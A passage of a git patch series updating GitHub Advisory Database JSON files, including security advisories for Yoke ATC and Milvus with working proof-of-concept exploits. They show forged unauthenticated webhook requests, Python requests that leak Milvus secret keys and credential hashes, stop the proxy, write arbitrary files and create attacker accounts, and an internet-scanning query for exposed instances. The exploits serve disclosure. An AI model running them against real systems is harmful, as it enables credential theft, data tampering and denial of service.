control-plane\nEOF\n\nkind create cluster --config /tmp/kind-config.yaml\n```\n\n**Step 2: Build and install Yoke CLI**\n```bash\ngit clone https://github.com/yokecd/yoke.git\ncd yoke\nGOPROXY=direct GOSUMDB=off go build -o /tmp/yoke ./cmd/yoke\n```\n\n**Step 3: Deploy ATC**\n```bash\n/tmp/yoke takeoff --create-namespace --namespace atc -wait 120s atc oci://ghcr.io/yokecd/atc-installer:latest\n```\n\n**Step 4: Deploy Backend Airway example**\n```bash\n/tmp/yoke takeoff -wait 60s backendairway \"https://github.com/yokecd/examples/releases/download/latest/atc_backend_airway.wasm.gz\"\n```\n\n### Exploitation Steps\n\n**Step 1: Create attacker pod**\n```bash\nkubectl apply -f - < /tmp/malicious-review.json << 'EOF'\n{\n \"apiVersion\": \"admission.k8s.io/v1\",\n \"kind\": \"AdmissionReview\",\n \"request\": {\n \"uid\": \"vul002-exploit-uid\",\n \"kind\": {\"group\": \"examples.com\", \"version\": \"v1\", \"kind\": \"Backend\"},\n \"resource\": {\"group\": \"examples.com\", \"version\": \"v1\", \"resource\": \"backends\"},\n \"name\": \"exploit-backend\",\n \"namespace\": \"default\",\n \"operation\": \"CREATE\",\n \"userInfo\": {\"username\": \"attacker-from-pod\", \"groups\": [\"system:unauthenticated\"]},\n \"object\": {\n \"apiVersion\": \"examples.com/v1\",\n \"kind\": \"Backend\",\n \"metadata\": {\"name\": \"exploit-backend\", \"namespace\": \"default\"},\n \"spec\": {\"image\": \"nginx:latest\", \"replicas\": 1}\n }\n }\n}\nEOF\n\nkubectl cp /tmp/malicious-review.json webhook-attacker:/tmp/malicious-review.json\n```\n\nSend the request:\n```bash\nkubectl exec webhook-attacker -- curl -k -s -X POST \\\n https://atc-atc.atc.svc.cluster.local:80/validations/backends.examples.com \\\n -H \"Content-Type: application/json\" \\\n -d @/tmp/malicious-review.json\n```\n\nActual output from verification:\n```json\n{\"kind\":\"AdmissionReview\",\"apiVersion\":\"admission.k8s.io/v1\",\"request\":{\"uid\":\"vul002-normal-test\",\"kind\":{\"group\":\"examples.com\",\"version\":\"v1\",\"kind\":\"Backend\"},\"resource\":{\"group\":\"examples.com\",\"version\":\"v1\",\"resource\":\"backends\"},\"name\":\"vul002-normal-backend\",\"namespace\":\"default\",\"operation\":\"CREATE\",\"userInfo\":{\"username\":\"attacker-from-pod\",\"groups\":[\"system:unauthenticated\"]},\"object\":{\"apiVersion\":\"examples.com/v1\",\"kind\":\"Backend\",\"metadata\":{\"name\":\"vul002-normal-backend\",\"namespace\":\"default\"},\"spec\":{\"image\":\"nginx:latest\",\"replicas\":1}},\"oldObject\":null,\"options\":null},\"response\":{\"uid\":\"vul002-normal-test\",\"allowed\":false,\"status\":{\"metadata\":{},\"status\":\"Failure\",\"message\":\"applying resource returned errors during dry-run...\"}}}\n```\n\n**Step 4: Verify ATC logs**\n```bash\nkubectl logs -n atc deployment/atc-atc --tail=20 | grep backends.examples.com\n```\n\nActual log output:\n```json\n{\"time\":\"2026-02-01T15:29:08.890991543Z\",\"level\":\"INFO\",\"msg\":\"request served\",\"component\":\"server\",\"code\":200,\"method\":\"POST\",\"path\":\"/validations/backends.examples.com\",\"elapsed\":\"435ms\",\"validation\":{\"allowed\":false,\"status\":\"Invalid\"}}\n```\n\nThe `elapsed: 435ms` indicates WASM module execution occurred.\n\n### Expected Result\n\nThe attacker pod successfully sends AdmissionReview requests directly to the ATC webhook endpoint without any authentication. The ATC controller processes the request and executes the WASM module, proving that:\n1. No TLS client certificate is required\n2. No request source validation occurs\n3. The fake `userInfo` is accepted without verification\n4. WASM modules are executed based on unauthenticated requests\n\n## Impact\n\n**Vulnerability Type**: Missing Authentication / Authentication Bypass\n\n**Attack Prerequisites**:\n- Attacker has access to a pod within the cluster network\n- Network policies do not restrict access to the ATC service (common in default configurations)\n\n**Impact Assessment**:\n- **Confidentiality**: Medium - Attacker can trigger WASM execution which may access controller context data\n- **Integrity**: High - Combined with VUL-001, attacker can create arbitrary Kubernetes resources\n- **Availability**: Medium - Attacker can cause resource exhaustion through repeated requests\n\n**Attack Scenario**:\n1. Attacker compromises a pod or gains access to the cluster network\n2. Attacker sends crafted AdmissionReview requests directly to ATC webhook\n3. ATC processes requests without verifying they came from the API Server\n4. Combined with annotation injection (VUL-001), attacker can execute arbitrary WASM code\n5. Malicious WASM can create resources or exfiltrate data using ATC's cluster-admin privileges\n\n## Severity\n\n**CVSS v3.1 Score**: 7.5 (High)\n\n**Vector**: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n\n- Attack Vector (AV): Network - Accessible from cluster network\n- Attack Complexity (AC): Low - Simple HTTP request\n- Privileges Required (PR): None - No authentication required\n- User Interaction (UI): None - Automatic processing\n- Scope (S): Unchanged\n- Confidentiality (C): None - Direct impact limited\n- Integrity (I): High - Can trigger unauthorized WASM execution\n- Availability (A): None - No direct availability impact\n\nNote: When combined with VUL-001, the overall impact increases significantly.\n\n## Affected Versions\n\n- Yoke ATC v0.18.x and earlier versions\n- All versions that implement Admission Webhook endpoints without client authentication\n\n## Patched Versions\n\nNo patch available at time of disclosure.\n\n## Workarounds\n\n1. **Network Policy**: Deploy NetworkPolicy to restrict access to ATC service, allowing only kube-apiserver to connect\n```yaml\napiVersion: networking.k8s.io/v1\nkind: NetworkPolicy\nmetadata:\n name: atc-webhook-policy\n namespace: atc\nspec:\n podSelector:\n matchLabels:\n yoke.cd/app: atc\n policyTypes:\n - Ingress\n ingress:\n - from:\n - namespaceSelector:\n matchLabels:\n kubernetes.io/metadata.name: kube-system\n podSelector:\n matchLabels:\n component: kube-apiserver\n```\n\n2. **Service Mesh**: Use a service mesh (Istio, Linkerd) to enforce mTLS between services\n\n3. **Pod Security**: Implement strict pod security policies to limit which pods can be created in the cluster\n\n## References\n\n- Yoke Project: https://github.com/yokecd/yoke\n- Kubernetes Admission Webhooks: https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/\n- CWE-306: Missing Authentication for Critical Function: https://cwe.mitre.org/data/definitions/306.html\n\n## Credits\ncredit for:\n@b0b0haha (603571786@qq.com)\n@lixingquzhi (mayedoushidalao@163.com)", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], "affected": [ { "package": { @@ -35,6 +40,10 @@ "type": "WEB", "url": "https://github.com/yokecd/yoke/security/advisories/GHSA-965m-v4cc-6334" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26055" + }, { "type": "PACKAGE", "url": "https://github.com/yokecd/yoke" @@ -51,6 +60,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-12T22:06:36Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-12T22:16:06Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-jr94-gj3h-c8rf/GHSA-jr94-gj3h-c8rf.json b/advisories/github-reviewed/2026/02/GHSA-jr94-gj3h-c8rf/GHSA-jr94-gj3h-c8rf.json index 8352be849afb8..e8b973a8fc6c9 100644 --- a/advisories/github-reviewed/2026/02/GHSA-jr94-gj3h-c8rf/GHSA-jr94-gj3h-c8rf.json +++ b/advisories/github-reviewed/2026/02/GHSA-jr94-gj3h-c8rf/GHSA-jr94-gj3h-c8rf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jr94-gj3h-c8rf", - "modified": "2026-02-12T22:13:04Z", + "modified": "2026-02-13T17:15:48Z", "published": "2026-02-12T22:13:04Z", "aliases": [ "CVE-2026-26185" @@ -59,6 +59,10 @@ "type": "WEB", "url": "https://github.com/directus/directus/security/advisories/GHSA-jr94-gj3h-c8rf" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26185" + }, { "type": "WEB", "url": "https://github.com/directus/directus/pull/26485" @@ -83,6 +87,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-12T22:13:04Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-12T22:16:07Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-p6pv-q7rc-g4h9/GHSA-p6pv-q7rc-g4h9.json b/advisories/github-reviewed/2026/02/GHSA-p6pv-q7rc-g4h9/GHSA-p6pv-q7rc-g4h9.json index ef61279e7c947..3aa9ca8632954 100644 --- a/advisories/github-reviewed/2026/02/GHSA-p6pv-q7rc-g4h9/GHSA-p6pv-q7rc-g4h9.json +++ b/advisories/github-reviewed/2026/02/GHSA-p6pv-q7rc-g4h9/GHSA-p6pv-q7rc-g4h9.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-p6pv-q7rc-g4h9", - "modified": "2026-02-07T00:33:27Z", + "modified": "2026-02-13T17:16:21Z", "published": "2026-02-05T21:13:24Z", "aliases": [ "CVE-2026-25757" @@ -117,6 +117,10 @@ "type": "WEB", "url": "https://github.com/spree/spree/commit/ea4a5db590ca753dbc986f2a4e818d9e0edfb1ad" }, + { + "type": "WEB", + "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_storefront/CVE-2026-25757.yml" + }, { "type": "PACKAGE", "url": "https://github.com/spree/spree" diff --git a/advisories/github-reviewed/2026/02/GHSA-wj8p-jj64-h7ff/GHSA-wj8p-jj64-h7ff.json b/advisories/github-reviewed/2026/02/GHSA-wj8p-jj64-h7ff/GHSA-wj8p-jj64-h7ff.json index 6827582b45fe6..5704bba6e30b7 100644 --- a/advisories/github-reviewed/2026/02/GHSA-wj8p-jj64-h7ff/GHSA-wj8p-jj64-h7ff.json +++ b/advisories/github-reviewed/2026/02/GHSA-wj8p-jj64-h7ff/GHSA-wj8p-jj64-h7ff.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-wj8p-jj64-h7ff", - "modified": "2026-02-12T22:07:10Z", + "modified": "2026-02-13T17:15:43Z", "published": "2026-02-12T22:06:45Z", "aliases": [ "CVE-2026-26056" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/yokecd/yoke/security/advisories/GHSA-wj8p-jj64-h7ff" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26056" + }, { "type": "PACKAGE", "url": "https://github.com/yokecd/yoke" @@ -52,6 +56,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-12T22:06:45Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-12T22:16:06Z" } } \ No newline at end of file From 72d21846d34d5522e8d13a87d27529d037e973c2 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 13 Feb 2026 17:19:08 +0000 Subject: [PATCH 08/36] Publish GHSA-7ppg-37fh-vcr6 --- .../2026/02/GHSA-7ppg-37fh-vcr6/GHSA-7ppg-37fh-vcr6.json | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-7ppg-37fh-vcr6/GHSA-7ppg-37fh-vcr6.json b/advisories/github-reviewed/2026/02/GHSA-7ppg-37fh-vcr6/GHSA-7ppg-37fh-vcr6.json index a071acda2440b..bb867f815572c 100644 --- a/advisories/github-reviewed/2026/02/GHSA-7ppg-37fh-vcr6/GHSA-7ppg-37fh-vcr6.json +++ b/advisories/github-reviewed/2026/02/GHSA-7ppg-37fh-vcr6/GHSA-7ppg-37fh-vcr6.json @@ -1,9 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-7ppg-37fh-vcr6", - "modified": "2026-02-11T19:49:44Z", + "modified": "2026-02-13T17:17:11Z", "published": "2026-02-11T19:49:44Z", - "aliases": [], + "aliases": [ + "CVE-2026-26190" + ], "summary": "Milvus: Unauthenticated Access to Restful API on Metrics Port (9091) Leads to Critical System Compromise", "details": "## Summary\n\nMilvus exposes TCP port 9091 by default with two critical authentication bypass vulnerabilities:\n\n1. The `/expr` debug endpoint uses a weak, predictable default authentication token derived from `etcd.rootPath` (default: `by-dev`), enabling arbitrary expression evaluation.\n2. The full REST API (`/api/v1/*`) is registered on the metrics/management port without any authentication, allowing unauthenticated access to all business operations including data manipulation and credential management.\n\n## Details\n\n### Vulnerability 1: Weak Default Authentication on `/expr` Endpoint\n\nThe `/expr` endpoint on port 9091 accepts an `auth` parameter that defaults to the `etcd.rootPath` value (`by-dev`). This value is well-known and predictable. An attacker who can reach port 9091 can evaluate arbitrary internal Go expressions, leading to:\n\n- **Information/Credential Disclosure**: Reading internal configuration values (MinIO secrets, etcd credentials) and user credential hashes via `param.MinioCfg.SecretAccessKey.GetValue()`, `rootcoord.meta.GetCredential(ctx, 'root')`, etc.\n- **Denial of Service**: Invoking `proxy.Stop()` to shut down the proxy service.\n- **Arbitrary File Write (potential RCE)**: Manipulating access log configuration parameters to write arbitrary content to arbitrary file paths on the server filesystem.\n\n### Vulnerability 2: Unauthenticated REST API on Metrics Port\n\nBusiness-logic HTTP handlers (collection management, data insertion, credential management) are registered on the metrics/management HTTP server at port 9091 via `registerHTTPServer()` in [`internal/distributed/proxy/service.go` (line 170)](https://github.com/milvus-io/milvus/blob/9996e8d1cebff7e7108bcb16d43124236de77438/internal/distributed/proxy/service.go#L170). These endpoints do not enforce any authentication, even when Milvus authentication is enabled on the primary gRPC/HTTP ports.\n\nAn attacker can perform any business operation without credentials, including:\n\n- Creating, listing, and deleting collections\n- Inserting and querying data\n- Creating, listing, and deleting user credentials\n- Modifying user passwords\n\n## Proof of Concept\n\n### PoC 1 ā€” `/expr` Endpoint Exploitation\n\n```python\nimport requests\n\nurl = \"http://:9091/expr\"\n\n# Leak sensitive configuration (e.g., MinIO secret key)\nres = requests.get(url, params={\n \"auth\": \"by-dev\",\n \"code\": \"param.MinioCfg.SecretAccessKey.GetValue()\"\n}, timeout=5)\nprint(res.json().get(\"output\", \"\"))\n\n# Retrieve hashed credentials for the root user\nres = requests.get(url, params={\n \"auth\": \"by-dev\",\n \"code\": \"rootcoord.meta.GetCredential(ctx, 'root')\"\n}, timeout=5)\nprint(res.json().get(\"output\", \"\"))\n\n# Denial of Service ā€” stop the proxy\nres = requests.get(url, params={\n \"auth\": \"by-dev\",\n \"code\": \"proxy.Stop()\"\n}, timeout=5)\n\n# Arbitrary file write (potential RCE)\nfor cmd in [\n 'param.Save(\"proxy.accessLog.localPath\", \"/tmp\")',\n 'param.Save(\"proxy.accessLog.formatters.base.format\", \"whoami\")',\n 'param.Save(\"proxy.accessLog.filename\", \"evil.sh\")',\n 'querycoord.etcdCli.KV.Put(ctx, \"by-dev/config/proxy/accessLog/enable\", \"true\")'\n]:\n requests.get(url, params={\"auth\": \"by-dev\", \"code\": cmd}, timeout=5)\n```\n\n### PoC 2 ā€” Unauthenticated REST API Access\n\n```python\nimport requests\n\ntarget_url = \"http://:9091\"\n\n# Create a user without any authentication\nres = requests.post(f\"{target_url}/api/v1/credential\", json={\n \"username\": \"attacker_user\",\n \"password\": \"MTIzNDU2Nzg5\",\n})\nprint(res.json())\n\n# List all users\nres = requests.get(f\"{target_url}/api/v1/credential/users\")\nprint(res.json()) # {'status': {}, 'usernames': ['root', 'attacker_user']}\n\n# Create and delete collections, insert data ā€” all without authentication\n```\n\n## Internet Exposure\n\nA significant number of publicly exposed Milvus instances are discoverable via internet-wide scanning using the pattern:\n\n```\nhttp.body=\"404 page not found\" && port=\"9091\"\n```\n\nThis indicates the vulnerability is actively exploitable in real-world production environments.\n\n## Impact\n\nAn unauthenticated remote attacker with network access to port 9091 can:\n\n1. **Exfiltrate secrets and credentials** ā€” MinIO keys, etcd credentials, user password hashes, and all internal configuration values.\n2. **Manipulate all data** ā€” Create, modify, and delete collections, insert or remove data, bypassing all application-level access controls.\n3. **Manage user accounts** ā€” Create administrative users, reset passwords, and escalate privileges.\n4. **Cause denial of service** ā€” Shut down proxy services, drop databases, or corrupt metadata.\n5. **Write arbitrary files** ā€” Potentially achieve remote code execution by writing malicious files to the filesystem via access log configuration manipulation.\n\n## Remediation\n\n### Recommended Fixes\n\n1. **Remove or disable the `/expr` endpoint** in production builds. If retained for debugging, it must require strong, non-default authentication and be disabled by default.\n2. **Do not register business API routes on the metrics port.** Separate the metrics/health endpoints from the application REST API to ensure authentication middleware applies consistently.\n3. **Bind port 9091 to localhost by default** (`127.0.0.1:9091`) so it is not externally accessible unless explicitly configured.\n4. **Enforce authentication on all API endpoints**, regardless of which port they are served on.\n\n### User Mitigations (until patched)\n\n- Block external access to port 9091 using firewall rules or network policies.\n- If running in Docker/Kubernetes, do not expose port 9091 outside the internal network.\n- Change the `etcd.rootPath` from the default value `by-dev` to a strong, random value (partial mitigation only ā€” does not address the unauthenticated REST API).\n\n## Credit\n\nThis vulnerability was discovered and responsibly reported by **YingLin Xie** (xieyinglin@hust.edu.cn). It was independently reported by [0x1f](https://github.com/0x1f) and zznQ ([ac0d3r](https://github.com/ac0d3r)).", "severity": [ From fd8723f904a302133f0e49a1d880516b9a13904f Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 13 Feb 2026 18:22:27 +0000 Subject: [PATCH 09/36] Publish GHSA-pm44-x5x7-24c4 --- .../2026/02/GHSA-pm44-x5x7-24c4/GHSA-pm44-x5x7-24c4.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-pm44-x5x7-24c4/GHSA-pm44-x5x7-24c4.json b/advisories/github-reviewed/2026/02/GHSA-pm44-x5x7-24c4/GHSA-pm44-x5x7-24c4.json index 8c5e98ce1e6a9..ea3ae3579b5d2 100644 --- a/advisories/github-reviewed/2026/02/GHSA-pm44-x5x7-24c4/GHSA-pm44-x5x7-24c4.json +++ b/advisories/github-reviewed/2026/02/GHSA-pm44-x5x7-24c4/GHSA-pm44-x5x7-24c4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pm44-x5x7-24c4", - "modified": "2026-02-11T21:40:07Z", + "modified": "2026-02-13T18:20:21Z", "published": "2026-02-09T12:30:22Z", "aliases": [ "CVE-2026-22922" @@ -28,7 +28,7 @@ "introduced": "3.1.0" }, { - "fixed": "3.17.0" + "fixed": "3.1.7" } ] } From 90f44678b6bbbed510aa44dc4c3d036d7d0cb276 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 13 Feb 2026 18:32:38 +0000 Subject: [PATCH 10/36] Advisory Database Sync --- .../GHSA-23wj-fq4f-57vr.json | 6 ++- .../GHSA-54jh-gr2j-w5jp.json | 13 ++++- .../GHSA-9cr4-jvh8-pr25.json | 6 ++- .../GHSA-c6wh-345m-mrfm.json | 6 ++- .../GHSA-g4fr-g4v5-cfmc.json | 6 ++- .../GHSA-jgcm-pqcv-h934.json | 6 ++- .../GHSA-f6p2-2572-4pjp.json | 6 ++- .../GHSA-m77w-6vjw-wh2f.json | 6 ++- .../GHSA-2g3f-rmh8-cj3f.json | 6 ++- .../GHSA-x34v-6wh4-m93r.json | 6 ++- .../GHSA-5mqf-9q34-g8c2.json | 6 ++- .../GHSA-9w8w-fgjg-w972.json | 6 ++- .../GHSA-6v67-599p-fprc.json | 6 ++- .../GHSA-9x7h-v87g-j6jw.json | 11 +++-- .../GHSA-rr66-qxh8-8qwq.json | 11 +++-- .../GHSA-45gw-fx24-h4pv.json | 15 ++++-- .../GHSA-75wh-ww84-2q6c.json | 11 +++-- .../GHSA-4vjp-phjj-3f57.json | 6 ++- .../GHSA-x2jm-xff2-34w4.json | 4 +- .../GHSA-2886-9536-rhhj.json | 6 ++- .../GHSA-rfj8-8392-mfcm.json | 6 ++- .../GHSA-v6c5-9mp4-mwq4.json | 6 ++- .../GHSA-5wfc-7v23-c2vf.json | 6 ++- .../GHSA-5mc7-p6pj-r3f5.json | 6 ++- .../GHSA-jh94-8q48-f3m3.json | 6 ++- .../GHSA-qg84-jfh7-8hpx.json | 3 +- .../GHSA-224f-wm46-5p4r.json | 33 +++++++++++++ .../GHSA-26vr-h5vf-58cq.json | 4 +- .../GHSA-3669-8ww5-g35f.json | 44 +++++++++++++++++ .../GHSA-3q2x-q945-c5mm.json | 6 ++- .../GHSA-4gg4-26q8-wv28.json | 37 ++++++++++++++ .../GHSA-5wr5-vxhh-x7gm.json | 44 +++++++++++++++++ .../GHSA-7v9f-f4qv-fcxh.json | 36 ++++++++++++++ .../GHSA-8xrx-9wj4-6775.json | 4 +- .../GHSA-c5gm-v7v7-vjx9.json | 4 +- .../GHSA-cgmm-x5ww-q5cr.json | 48 +++++++++++++++++++ .../GHSA-cm39-88fp-pv6j.json | 15 ++++-- .../GHSA-fq6p-4h82-858f.json | 29 +++++++++++ .../GHSA-fqf2-x743-9564.json | 4 +- .../GHSA-h6jx-x5f4-qmj9.json | 15 ++++-- .../GHSA-h892-rh45-x8jp.json | 11 +++-- .../GHSA-j98c-62jj-x3h3.json | 29 +++++++++++ .../GHSA-jhq4-533p-8p4c.json | 15 ++++-- .../GHSA-m7rx-q9f3-3p96.json | 3 +- .../GHSA-p47v-wp9g-8362.json | 15 ++++-- .../GHSA-p5cr-gq3j-93c4.json | 15 ++++-- .../GHSA-p5wr-5p37-2wm6.json | 6 ++- .../GHSA-qqhc-37jx-7gh5.json | 40 ++++++++++++++++ .../GHSA-r3p8-h9vv-9cqc.json | 37 ++++++++++++++ .../GHSA-vwfj-gc28-j2fg.json | 40 ++++++++++++++++ .../GHSA-w7w9-2vjv-7r67.json | 40 ++++++++++++++++ .../GHSA-x3j4-874w-h7pv.json | 29 +++++++++++ .../GHSA-xrqq-m9vv-pq36.json | 15 ++++-- 53 files changed, 730 insertions(+), 70 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-224f-wm46-5p4r/GHSA-224f-wm46-5p4r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3669-8ww5-g35f/GHSA-3669-8ww5-g35f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4gg4-26q8-wv28/GHSA-4gg4-26q8-wv28.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5wr5-vxhh-x7gm/GHSA-5wr5-vxhh-x7gm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7v9f-f4qv-fcxh/GHSA-7v9f-f4qv-fcxh.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cgmm-x5ww-q5cr/GHSA-cgmm-x5ww-q5cr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fq6p-4h82-858f/GHSA-fq6p-4h82-858f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j98c-62jj-x3h3/GHSA-j98c-62jj-x3h3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qqhc-37jx-7gh5/GHSA-qqhc-37jx-7gh5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r3p8-h9vv-9cqc/GHSA-r3p8-h9vv-9cqc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vwfj-gc28-j2fg/GHSA-vwfj-gc28-j2fg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w7w9-2vjv-7r67/GHSA-w7w9-2vjv-7r67.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x3j4-874w-h7pv/GHSA-x3j4-874w-h7pv.json diff --git a/advisories/unreviewed/2022/05/GHSA-23wj-fq4f-57vr/GHSA-23wj-fq4f-57vr.json b/advisories/unreviewed/2022/05/GHSA-23wj-fq4f-57vr/GHSA-23wj-fq4f-57vr.json index 19f7f39ffbc3a..ed8de91296818 100644 --- a/advisories/unreviewed/2022/05/GHSA-23wj-fq4f-57vr/GHSA-23wj-fq4f-57vr.json +++ b/advisories/unreviewed/2022/05/GHSA-23wj-fq4f-57vr/GHSA-23wj-fq4f-57vr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-23wj-fq4f-57vr", - "modified": "2022-05-14T02:03:36Z", + "modified": "2026-02-13T18:31:21Z", "published": "2022-05-14T02:03:36Z", "aliases": [ "CVE-2018-15899" @@ -22,6 +22,10 @@ { "type": "WEB", "url": "https://github.com/bg5sbk/MiniCMS/issues/21" + }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2018-15899.md" } ], "database_specific": { diff --git a/advisories/unreviewed/2022/05/GHSA-54jh-gr2j-w5jp/GHSA-54jh-gr2j-w5jp.json b/advisories/unreviewed/2022/05/GHSA-54jh-gr2j-w5jp/GHSA-54jh-gr2j-w5jp.json index 16b452f6c8fef..20d62a664e145 100644 --- a/advisories/unreviewed/2022/05/GHSA-54jh-gr2j-w5jp/GHSA-54jh-gr2j-w5jp.json +++ b/advisories/unreviewed/2022/05/GHSA-54jh-gr2j-w5jp/GHSA-54jh-gr2j-w5jp.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-54jh-gr2j-w5jp", - "modified": "2022-05-24T19:05:59Z", + "modified": "2026-02-13T18:31:21Z", "published": "2022-05-24T19:05:59Z", "aliases": [ "CVE-2021-35438" ], "details": "phpIPAM 1.4.3 allows Reflected XSS via app/dashboard/widgets/ipcalc-result.php and app/tools/ip-calculator/result.php of the IP calculator.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -17,6 +22,10 @@ { "type": "WEB", "url": "https://github.com/phpipam/phpipam/issues/3351" + }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2021-35438.md" } ], "database_specific": { diff --git a/advisories/unreviewed/2022/05/GHSA-9cr4-jvh8-pr25/GHSA-9cr4-jvh8-pr25.json b/advisories/unreviewed/2022/05/GHSA-9cr4-jvh8-pr25/GHSA-9cr4-jvh8-pr25.json index 6c04751d31c4c..7f08fef4180f2 100644 --- a/advisories/unreviewed/2022/05/GHSA-9cr4-jvh8-pr25/GHSA-9cr4-jvh8-pr25.json +++ b/advisories/unreviewed/2022/05/GHSA-9cr4-jvh8-pr25/GHSA-9cr4-jvh8-pr25.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9cr4-jvh8-pr25", - "modified": "2022-05-17T02:54:58Z", + "modified": "2026-02-13T18:31:21Z", "published": "2022-05-17T02:54:58Z", "aliases": [ "CVE-2017-6537" @@ -23,6 +23,10 @@ "type": "WEB", "url": "https://github.com/WPO-Foundation/webpagetest/issues/837" }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2017-6537.md" + }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/96935" diff --git a/advisories/unreviewed/2022/05/GHSA-c6wh-345m-mrfm/GHSA-c6wh-345m-mrfm.json b/advisories/unreviewed/2022/05/GHSA-c6wh-345m-mrfm/GHSA-c6wh-345m-mrfm.json index 2a3a2d6ac3379..cb6e77cd91868 100644 --- a/advisories/unreviewed/2022/05/GHSA-c6wh-345m-mrfm/GHSA-c6wh-345m-mrfm.json +++ b/advisories/unreviewed/2022/05/GHSA-c6wh-345m-mrfm/GHSA-c6wh-345m-mrfm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c6wh-345m-mrfm", - "modified": "2022-05-17T02:56:29Z", + "modified": "2026-02-13T18:31:21Z", "published": "2022-05-17T02:56:29Z", "aliases": [ "CVE-2017-6396" @@ -23,6 +23,10 @@ "type": "WEB", "url": "https://github.com/WPO-Foundation/webpagetest/issues/820" }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2017-6396.md" + }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/96553" diff --git a/advisories/unreviewed/2022/05/GHSA-g4fr-g4v5-cfmc/GHSA-g4fr-g4v5-cfmc.json b/advisories/unreviewed/2022/05/GHSA-g4fr-g4v5-cfmc/GHSA-g4fr-g4v5-cfmc.json index 2a156c1666c14..c1793f772b5f7 100644 --- a/advisories/unreviewed/2022/05/GHSA-g4fr-g4v5-cfmc/GHSA-g4fr-g4v5-cfmc.json +++ b/advisories/unreviewed/2022/05/GHSA-g4fr-g4v5-cfmc/GHSA-g4fr-g4v5-cfmc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g4fr-g4v5-cfmc", - "modified": "2022-05-13T01:12:12Z", + "modified": "2026-02-13T18:31:21Z", "published": "2022-05-13T01:12:12Z", "aliases": [ "CVE-2017-6478" @@ -23,6 +23,10 @@ "type": "WEB", "url": "https://github.com/paintballrefjosh/MaNGOSWebV4/issues/15" }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2017-6478.md" + }, { "type": "WEB", "url": "https://github.com/paintballrefjosh/MaNGOSWebV4/releases/tag/4.0.8" diff --git a/advisories/unreviewed/2022/05/GHSA-jgcm-pqcv-h934/GHSA-jgcm-pqcv-h934.json b/advisories/unreviewed/2022/05/GHSA-jgcm-pqcv-h934/GHSA-jgcm-pqcv-h934.json index f56a19299b36b..2abd99ac4d2f4 100644 --- a/advisories/unreviewed/2022/05/GHSA-jgcm-pqcv-h934/GHSA-jgcm-pqcv-h934.json +++ b/advisories/unreviewed/2022/05/GHSA-jgcm-pqcv-h934/GHSA-jgcm-pqcv-h934.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jgcm-pqcv-h934", - "modified": "2022-05-17T02:54:55Z", + "modified": "2026-02-13T18:31:21Z", "published": "2022-05-17T02:54:55Z", "aliases": [ 